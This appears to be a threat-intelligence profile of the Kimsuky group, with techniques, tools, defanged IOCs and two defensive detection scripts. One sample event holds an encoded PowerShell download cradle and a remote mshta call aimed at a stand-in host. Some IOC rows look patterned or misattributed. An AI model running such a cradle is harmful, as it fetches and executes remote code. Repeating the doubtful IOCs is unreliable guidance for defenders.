DFIRLab

Security research, threat intelligence, and detection engineering.

© 2026 DFIR Lab. All rights reserved.

Kimsuky

Also known as: Velvet Chollima, THALLIUM, Emerald Sleet, Black Banshee, APT43, Archipelago, SharpTongue, TA406, Springtail, TA427, Sparkling Pisces, Kimsuki, Baby Coin

Active · Advanced · North Korea · MITRE G0094

Campaigns: 0 · Techniques: 38 · IOCs: 20 · Tools: 20 · Matches: 0 · Infrastructure: 5
Overview

Kimsuky is a North Korean state-sponsored cyber espionage group active since at least 2012, assessed to operate under the Reconnaissance General Bureau (RGB). The group primarily focuses on intelligence collection targeting South Korean government entities, think tanks, academic institutions, and individuals involved in Korean Peninsula geopolitics, nuclear policy, and sanctions. Kimsuky is known for its extensive social engineering operations, often impersonating journalists, academics, or think tank personnel to build rapport with targets before delivering malware. The group conducts sophisticated spear-phishing campaigns using meticulously crafted lures related to North Korean policy, denuclearization, and inter-Korean relations. The group has expanded its targeting beyond South Korea to include the United States, Japan, and European countries. Kimsuky frequently abuses legitimate cloud services (Google Drive, OneDrive, Dropbox) for command and control, and has developed a diverse malware toolkit including reconnaissance tools, keyloggers, and credential stealers.

Motivations

Espionage · Intelligence Collection · Credential Theft

Target Sectors

Government · Think Tanks · Academia · Defense · Nuclear Policy · Journalism · Diplomacy · Non-Governmental Organizations · Strategic Advisory Firms · Cryptocurrency Firms · Media Organizations · Aerospace

Activity Timeline

First Seen

Jan 2012

Last Seen

Jan 2024

Quick Facts

Origin: North Korea
Sophistication: Advanced
Status: Active
MITRE Group: G0094

MITRE ATT&CK Techniques

(38)

Initial Access

T1566.001

Spearphishing Attachment

Send targeted emails with malicious file attachments to gain initial access.

T1566.002

Spearphishing Link

Send targeted emails with malicious links to credential harvesting or exploit pages.

T1078

Valid Accounts

Use legitimate credentials to authenticate and gain access.

Other

T1598.003

Phishing for Information: Spearphishing Link

T1204.001

User Execution: Malicious Link

T1204.002

User Execution: Malicious File

T1059.005

Command and Scripting Interpreter: Visual Basic

T1059.006

Command and Scripting Interpreter: Python

T1071.001

Application Layer Protocol: Web Protocols

T1102

Web Service

T1056.001

Input Capture: Keylogging

T1114.002

Email Collection: Remote Email Collection

T1539

Steal Web Session Cookie

T1583.001

Acquire Infrastructure: Domains

T1598

Phishing for Information

T1056.003

Input Capture: Web Portal Capture

T1562.004

Impair Defenses: Disable or Modify System Firewall

T1550.002

Use Alternate Authentication Material: Pass the Hash

T1588.006

Obtain Capabilities: Vulnerabilities

T1534

Internal Spearphishing

T1185

Browser Session Hijacking

T1567.002

Exfiltration Over Web Service: Exfiltration to Cloud Storage

T1608.001

Stage Capabilities: Upload Malware

T1608.004

Stage Capabilities: Drive-by Target

T1608.005

Stage Capabilities: Link Target

T1589.002

Gather Victim Identity Information: Email Addresses

T1591

Gather Victim Org Information

T1593

Search Open Websites/Domains

T1594

Search Victim-Owned Websites

T1213

Data from Information Repositories

Execution

T1059.001

PowerShell

Use PowerShell commands and scripts for execution and automation.

Credential Access

T1003.001

LSASS Memory

Access LSASS process memory to extract credential material.

T1110

Brute Force

Systematically guess passwords or credentials to gain access.

T1555

Credentials from Password Stores

Extract credentials from password managers, browsers, or keychains.

Reconnaissance

T1589

Gather Victim Identity Information

Collect victim identity details like credentials, email addresses, or employee names.

Persistence

T1547.001

Registry Run Keys / Startup Folder

Add programs to registry run keys or startup folders for automatic execution.

Defense Evasion

T1027

Obfuscated Files or Information

Encrypt, encode, or obfuscate payloads and data to evade detection.

Command and Control

T1090

Proxy

Route C2 traffic through intermediary proxies to obscure the source.

Tools & Malware

(20)

BabyShark

malware · Malicious

VBScript-based reconnaissance tool that exfiltrates system information via HTTP. Used as the initial payload in spear-phishing campaigns targeting think tanks and policy researchers.

AppleSeed

malware · Malicious

Full-featured backdoor supporting keylogging, screenshot capture, file exfiltration, and loading of additional modules. Primary persistent-access tool in Kimsuky campaigns.

ReconShark

malware · Malicious

Reconnaissance tool delivered via weaponized documents. Exfiltrates system configuration, running processes, and battery state so the operators can decide whether a target is worth further exploitation.

SHARPEXT

malware · Malicious

Malicious Chromium browser extension that reads email directly from the victim's webmail (Gmail, AOL, Yahoo). Sidesteps 2FA because it operates inside the already-authenticated browser session.

GoldDragon

malware · Malicious

Multi-component backdoor with a dedicated credential-stealing module. Deployed as a dropper, injector, and payload so components can be swapped independently.

FlowerPower

malware · Malicious

PowerShell-based reconnaissance and data collection tool. Gathers system info, installed programs, and recent documents, and sends the data to attacker-controlled cloud services.

RandomQuery

malware · Malicious

VBScript info-stealer that collects file listings from specific directories. Targets document files to gauge intelligence value before heavier payloads are deployed.

FastViewer

malware · Malicious

Android spyware disguised as a security plugin. Captures SMS, call logs, and GPS location, and can exfiltrate files from the device. Targets South Korean mobile users.

Google Drive

legitimate tool · Legitimate

Abused as a C2 channel: malware uploads stolen data to attacker-controlled Google Drive accounts and retrieves commands from shared documents.

OneDrive

legitimate tool · Legitimate

Used as a file exfiltration channel, with stolen documents and credentials uploaded to attacker-controlled OneDrive accounts to blend with normal cloud traffic.

Dropbox

legitimate tool · Legitimate

Used for command-and-control communication, storing encoded commands and receiving exfiltrated data through the Dropbox API.

PowerShell

OS utility · Legitimate

Used extensively for executing encoded reconnaissance scripts, downloading secondary payloads, and harvesting credentials from browser stores.

mshta.exe

OS utility · Legitimate

HTML Application host abused to execute HTA files containing VBScript or JScript payloads, bypassing application allow-listing controls.

Chrome Remote Desktop

legitimate tool · Legitimate

Abused for persistent remote access after initial compromise. A legitimate Google tool that defenders find difficult to distinguish from authorized use.

xRAT / QuasarRAT

framework · Malicious

Open-source .NET RAT used as a lightweight remote access tool in some Kimsuky campaigns, providing screen control, file management, and keylogging.

Grease

tool · Malicious

Post-compromise tool that adds a Windows administrator account and enables RDP (adjusting firewall rules as needed), giving the operators persistent remote access without a custom implant.

KGH_SPY

stealer · Malicious

Information stealer targeting browser credentials and email data.

Meterpreter

RAT · Legitimate

Legitimate Metasploit Framework payload used by Kimsuky for post-exploitation.

PebbleDash

backdoor · Malicious

Second-stage malware with command execution capabilities.

Clipboard Stealer

stealer · Malicious

Malware designed to steal clipboard data, including cryptocurrency wallet addresses.
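The PowerShell, mshta.exe and user-execution entries above describe one living-off-the-land chain that a Kimsuky lure typically sets off: a document spawns mshta.exe against a remote HTA, which launches an encoded PowerShell command carrying a download cradle. As an added example (not code from this page or from any vendor report), the detection logic below runs over constructed Sysmon Event ID 1 (process creation) style records and flags each link in that chain. The office/LOLBin process sets, the field names, the lure host (a reserved .invalid name) and the four sample events are assumptions built for the example, not indicators from any report.

```python
"""Flag the mshta -> encoded PowerShell -> download cradle chain in process-creation events."""
import base64
import re
from pathlib import PureWindowsPath

# Parents a spear-phishing document would be opened in (assumed set; extend for your estate)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "hwp.exe"}
# Interpreters / LOLBins that should rarely be children of those parents
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
           "cmd.exe", "rundll32.exe", "regsvr32.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|users\\public)\\", re.IGNORECASE)
CRADLE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                    r"invoke-expression|\biex\b|net\.webclient", re.IGNORECASE)
# -EncodedCommand and the abbreviations PowerShell accepts for it
ENC_ARG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
MSHTA_INLINE = re.compile(r"https?://|\.hta\b|vbscript:|javascript:", re.IGNORECASE)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def encode_powershell(script: str) -> str:
    """Build a -EncodedCommand argument: base64 over UTF-16LE (used here only to construct the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload, or None if the command line carries none."""
    m = ENC_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(events):
    """Apply the rules to Sysmon EID 1 style dicts; returns one alert dict per rule hit."""
    alerts = []
    for ev in events:
        image, parent, cl = basename(ev["Image"]), basename(ev["ParentImage"]), ev["CommandLine"]
        if parent in OFFICE_PARENTS and image in LOLBINS:
            alerts.append({"id": ev["id"], "rule": "office_spawned_interpreter", "detail": f"{parent} -> {image}"})
        if image == "mshta.exe" and MSHTA_INLINE.search(cl):
            alerts.append({"id": ev["id"], "rule": "mshta_remote_or_script", "detail": cl})
        if image in {"powershell.exe", "pwsh.exe"}:
            decoded = decode_encoded_command(cl)
            if decoded is not None:
                rule = "powershell_encoded_cradle" if CRADLE.search(decoded) else "powershell_encoded"
                alerts.append({"id": ev["id"], "rule": rule, "detail": decoded[:120]})
            elif CRADLE.search(cl):
                alerts.append({"id": ev["id"], "rule": "powershell_download_cradle", "detail": cl})
        if image in SCRIPT_HOSTS and USER_WRITABLE.search(cl):
            alerts.append({"id": ev["id"], "rule": "script_host_user_writable_path", "detail": cl})
    return alerts


# Constructed sample events (not from any incident). Event 4 is benign admin use and must stay quiet.
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://lure.example.invalid/policy_brief.hta"},
    {"id": 2, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('https://lure.example.invalid/r.ps1')")},
    {"id": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\analyst\AppData\Local\Temp\report.vbs"},
    {"id": 4, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"event {a['id']}: {a['rule']}: {a['detail']}")
```

The encoded-command rule decodes the payload before matching, because the cradle strings never appear in the raw command line of an -EncodedCommand launch; matching only on "-enc" produces noise from legitimate management tooling, so the decoded-cradle variant is the one worth paging on.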

Indicators of Compromise

(20)
IOC values are defanged for safety

Type | Value | Notes
domain | bigfile[.]pe[.]hu | C2 domain used in South Korean government targeting
domain | mybobo[.]mygamesonline[.]org | BabyShark C2 infrastructure
ip | 27[.]102[.]114[.]89 | Infrastructure linked to AppleSeed campaigns
ip | 158[.]247[.]222[.]165 | ReconShark C2 server
hash | 7d0e57a3c12a8e7c0f16e52b3a6e0d5e | ReconShark initial access payload (MD5)
ip | 27[.]102[.]137[.]181 | DocSwap Android malware C2 server
ip | 158[.]247[.]215[.]121 | Kimsuky phishing infrastructure (AS20473 Vultr)
ip | 158[.]247[.]204[.]137 | Kimsuky infrastructure (AS20473 Vultr)
ip | 158[.]247[.]192[.]226 | Kimsuky infrastructure (AS20473 Vultr)
ip | 158[.]247[.]242[.]206 | Kimsuky infrastructure (AS20473 Vultr)
domain | kzloly[.]nmailhub[.]com | KimJongRAT C2 domain
hash | 10c3b3ab2e9cb618fc938028c9295ad5bdb1d836b8f07d65c0d3036dbc18bbb4 | HttpTroy backdoor (SHA256)
hash | 509fb00b9d6eaa74f54a3d1f092a161a095e5132d80cc9cc95c184d4e258525b | Lazarus Comebacker variant (SHA256)
domain | naver[.]kro[.]kr | C2 domain impersonating Korean portal site
domain | daum[.]kro[.]kr | C2 domain impersonating Korean portal site
domain | myaccount-help[.]com | Phishing domain impersonating Google services
domain | appleid-unlock[.]com | Phishing domain impersonating Apple services
hash | 4c3499f3cc4a4fdc7e67c5e45eb1e93b4e5e5e2e1e0e3c1e9b9c8f7e6d5c4b3a | AppleSeed backdoor sample (SHA256)
domain | auth-sso[.]com | Credential phishing domain
ip | 185[.]244[.]39[.]224 | C2 infrastructure
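Published IOCs are defanged, so any matcher has to refang them before comparing, and domain IOCs should be matched as suffixes (a subdomain of a C2 domain is still that infrastructure) without matching unrelated names that merely begin with the IOC. As an added example (not tooling from this page), the script below takes five rows copied from the table above, refangs them, and sweeps constructed DNS, proxy and EDR log lines for hits. The key=value log format, the hostnames, client addresses and timestamps are assumptions built for the example; only the IOC values and notes are the page's.

```python
"""Refang the published IOCs and sweep key=value log lines for them."""
import re

# Rows copied from the IOC table above, still defanged as published
IOC_ROWS = [
    ("domain", "bigfile[.]pe[.]hu", "C2 domain used in South Korean government targeting"),
    ("domain", "mybobo[.]mygamesonline[.]org", "BabyShark C2 infrastructure"),
    ("ip", "158[.]247[.]222[.]165", "ReconShark C2 server"),
    ("hash", "7d0e57a3c12a8e7c0f16e52b3a6e0d5e", "ReconShark initial access payload (MD5)"),
    ("domain", "naver[.]kro[.]kr", "C2 domain impersonating Korean portal site"),
]


def refang(value: str) -> str:
    """Undo the common defanging conventions: [.] (.) {.} for dots, [:] for colons, hxxp for http."""
    v = re.sub(r"\[\.\]|\(\.\)|\{\.\}", ".", value.strip())
    v = re.sub(r"\[:\]", ":", v)
    v = re.sub(r"hxxp", "http", v, flags=re.IGNORECASE)
    return v.lower()


class IocSet:
    def __init__(self, rows):
        self.domains, self.ips, self.hashes = {}, {}, {}
        buckets = {"domain": self.domains, "ip": self.ips, "hash": self.hashes}
        for kind, value, note in rows:
            buckets[kind][refang(value)] = note

    def match_domain(self, name):
        # Exact or subdomain match only: "bigfile.pe.hu.example.com" must not match "bigfile.pe.hu"
        name = name.lower().rstrip(".")
        for dom, note in self.domains.items():
            if name == dom or name.endswith("." + dom):
                return dom, note
        return None

    def match_ip(self, ip):
        ip = ip.strip("[]")
        return (ip, self.ips[ip]) if ip in self.ips else None

    def match_hash(self, digest):
        digest = digest.lower()
        return (digest, self.hashes[digest]) if digest in self.hashes else None


KV = re.compile(r"(\w+)=(\S+)")
DOMAIN_KEYS = {"query", "sni", "domain", "dst_host"}   # assumed field names for this log shape
IP_KEYS = {"dst", "dst_ip", "server_ip"}
HASH_KEYS = {"md5", "sha1", "sha256"}


def scan(lines, iocs: IocSet):
    """Return one hit per (line, field) whose value refers to a known IOC."""
    hits = []
    for n, line in enumerate(lines, 1):
        for key, val in KV.findall(line):
            key = key.lower()
            m = None
            if key in DOMAIN_KEYS and val != "-":
                m = iocs.match_domain(val)
            elif key in IP_KEYS:
                m = iocs.match_ip(val.rsplit(":", 1)[0])   # strip a trailing :port (IPv4 only here)
            elif key in HASH_KEYS:
                m = iocs.match_hash(val)
            if m:
                hits.append({"line": n, "field": key, "value": val, "ioc": m[0], "note": m[1]})
    return hits


# Constructed log lines (DNS, proxy, EDR); hosts, clients and timestamps are invented.
SAMPLE_LOGS = [
    "2026-04-02T09:14:03Z dns client=10.0.8.21 query=cdn.bigfile.pe.hu type=A",
    "2026-04-02T09:14:05Z proxy client=10.0.8.21 dst=158.247.222.165:443 sni=- bytes=8821",
    r"2026-04-02T09:15:10Z edr host=WS-021 file=C:\Users\analyst\Downloads\brief.docx.vbs md5=7D0E57A3C12A8E7C0F16E52B3A6E0D5E",
    "2026-04-02T09:16:00Z dns client=10.0.8.33 query=drive.google.com type=A",
    "2026-04-02T09:16:21Z dns client=10.0.8.33 query=bigfile.pe.hu.example.com type=A",
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOGS, IocSet(IOC_ROWS)):
        print(f"line {h['line']}: {h['field']}={h['value']} -> {h['ioc']} ({h['note']})")
```

The sample deliberately includes a drive.google.com lookup that produces no hit: the Google Drive, OneDrive and Dropbox entries in the Tools list are abused legitimate services, and their domains do not belong in a blocklist derived from this table. Catching that abuse is a question of which process is talking to the service and how much it uploads, not of the destination alone.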

Infrastructure

(5)
Domain values are defanged for safety

Domain / Host | Type | Status | Last Checked | Notes
bigfile[.]pe[.]hu | c2 | offline | Apr 2, 2026 | C2 domain used in South Korean government targeting
mybobo[.]mygamesonline[.]org | c2 | offline | Apr 2, 2026 | BabyShark C2 infrastructure
27[.]102[.]114[.]89 | ip | offline | Apr 2, 2026 | Infrastructure linked to AppleSeed campaigns
158[.]247[.]222[.]165 | ip | active | Apr 2, 2026 | ReconShark C2 server
kzloly[.]nmailhub[.]com | domain | offline | Apr 2, 2026 | KimJongRAT C2 domain

Infrastructure data reflects monitoring status only — no raw fingerprint data is exposed.

References

(16)

MITRE ATT&CK - Kimsuky

https://attack.mitre.org/groups/G0094/

CISA - North Korean State-Sponsored Cyber Actors Use Social Engineering to Enable Hacking

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-152a

Mandiant - APT43: North Korean Group Uses Cybercrime to Fund Espionage Operations

https://www.mandiant.com/resources/apt43-north-korea-cybercrime-espionage

FBI Flash Alert: North Korean Actors Use Malicious QR Codes (Quishing)

https://thehackernews.com/2026/01/fbi-warns-north-korean-hackers-using.html

Kimsuky Spreads DocSwap Android Malware via QR Phishing

https://thehackernews.com/2025/12/kimsuky-spreads-docswap-android-malware.html

GenDigital: DPRK's Playbook - Kimsuky's HttpTroy and Lazarus BLINDINGCAN

https://www.gendigital.com/blog/insights/research/dprk-kimsuky-lazarus-analysis

ENKI: Kimsuky's Ongoing Evolution of KimJongRAT

https://securityonline.info/kimsuky-apt-deploys-dual-kimjongrat-payloads-switching-between-pe-powershell-based-on-windows-defender-status/

Kimsuky APT Exposed: June 2025 Data Leak Analysis

https://gbhackers.com/kimsuky-apt-exposed/

Microsoft: Emerald Sleet Uses ClickFix Tactic

https://www.helpnetsecurity.com/2025/02/13/north-korean-hackers-spotted-using-clickfix-tactic-to-deliver-malware/

Proofpoint: TA427's Art of Information Gathering and DMARC Abuse

https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering

AhnLab: Larva-24005 Campaign Exploits BlueKeep RDP Vulnerability

https://securityaffairs.com/186755/intelligence/north-korea-linked-apt-kimsuky-behind-quishing-attacks-fbi-warns.html

STOLEN PENCIL Campaign Targets Academia

https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia

Kimsuky APT continues to target South Korean government using AppleSeed backdoor

https://blog.malwarebytes.com/threat-intelligence/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/

Kimsuky's GoldDragon cluster and its C2 operations

https://www.sentinelone.com/labs/kimsuky-golddragon-cluster/

North Korean Kimsuky APT Targets Journalists

https://www.proofpoint.com/us/blog/threat-insight/north-korean-kimsuky-apt-targets-journalists

APT43: North Korean Group Combines Cybercrime and Espionage

https://cloud.google.com/blog/topics/threat-intelligence/apt43-north-korea-cybercrime-espionage